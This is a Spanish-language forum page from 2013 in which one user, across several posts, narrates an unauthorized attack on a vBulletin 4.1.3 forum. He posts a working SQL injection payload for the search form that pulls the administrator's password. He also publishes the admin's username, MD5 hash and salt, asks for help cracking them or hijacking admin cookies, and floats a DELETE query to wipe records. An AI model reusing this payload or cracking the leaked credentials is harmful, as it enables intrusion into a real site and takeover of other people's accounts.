elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Nivel Web / Re: descifrar Hash vbulletin 4.1.3 en: 10 Abril 2013, 00:01 am
No hay suerte, te dejo la inyeccion SQL para ver si se puede hacer algo mas con ella.

Código
  1.  
  2. &searchfromtype=vBForum:SocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) UNION SELECT password FROM USER
  3.  
  4. WHERE userid=1 AND ROW(1,1)>(SELECT COUNT(*),concat( (SELECT USER.password) ,0x3a,FLOOR(rand(0)*2)) x FROM (SELECT 1
  5.  
  6. UNION SELECT 2 UNION SELECT 3)a GROUP BY x LIMIT 1) -- /*);
  7.  
  8.  

Eso se agrega en el formulario de busqueda.


Estaria bueno enviar una orden para borrar cierto registro tipo:

Código
  1. mysql_query(DELETE FROM USER WHERE userid=408);


Probe sin resultados.
2  Seguridad Informática / Nivel Web / Re: descifrar Hash vbulletin 4.1.3 en: 3 Abril 2013, 00:51 am
estoy atascado

Probe con la cookie con un complemento de firefox para modificarlas pero aparentemente vbulletin crea otro dato en md5 para las cookies asi que es imposble.

Probe con muchos diccionarios sin exito  en la pc tambien mediante php :-( sin resultados, el script funciona con la salt hice la prueba con mi propia cuenta y funciono pero por ahora no logro crackear la de los administradores.

La salt tiene que contener 30 caracteres el problema con < hay que cambiarla por el signo menor.

&lt;= <

 :P donde puedo conseguir diccionarios interesantes si estan relacionados con el futbol mejor.
3  Seguridad Informática / Nivel Web / Re: descifrar Hash vbulletin 4.1.3 en: 29 Marzo 2013, 07:17 am
 ;D


logre obtener el salt del administrador ahora tengo mas datos


Admin id1
hash: e53a3baca64869cb558bc6f6f5fab4f5
salt: aY-t'2c;`&lt;s?GYYqsDnUP=(AQ(mH'8

voy a intentar crackearlo
4  Seguridad Informática / Nivel Web / Re: descifrar Hash vbulletin 4.1.3 en: 29 Marzo 2013, 07:11 am

Código
  1. function fetch_user_salt($length = 30)
  2. {
  3. $salt = '';
  4. for ($i = 0; $i < $length; $i++)
  5. {
  6. $salt .= chr(vbrand(33, 126));
  7. }
  8. return $salt;
  9. }
  10.  

parece que el salt se obtiene al azar y es pasado a ascii  :P
5  Seguridad Informática / Nivel Web / Re: descifrar Hash vbulletin 4.1.3 en: 29 Marzo 2013, 06:39 am
encontre esto en el archivo passwordcheck.php

WHERE password = MD5(CONCAT(MD5(username),salt))

el valor salt tiene el siguiente formato

n]t!Cir&n<z0FC7FDdPNMK@h6[hwqy

nose en que esta cifrado
6  Seguridad Informática / Nivel Web / Re: descifrar Hash vbulletin 4.1.3 en: 28 Marzo 2013, 23:21 pm
Como se obtiene el salt con que datos?
7  Seguridad Informática / Nivel Web / descifrar Hash vbulletin 4.1.3 en: 28 Marzo 2013, 18:27 pm
Accedi a los hashes de un foro en vbulletin mediante una inyección en php

paso los hash  

Usuario:hash:ide

cai_baguette:e53a3baca64869cb558bc6f6f5fab4f5:1


El problema que tengo ahora es no puedo descifrar los hash presumiblemente en MD5.

Tambien intente en modficar cookies de acceso sin resultados positivos.

El desafio es encontrar una forma de descifrar los hash o utilizar estos para acceder a las cuentas de los administradores.

Saludos
Juansemaster
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines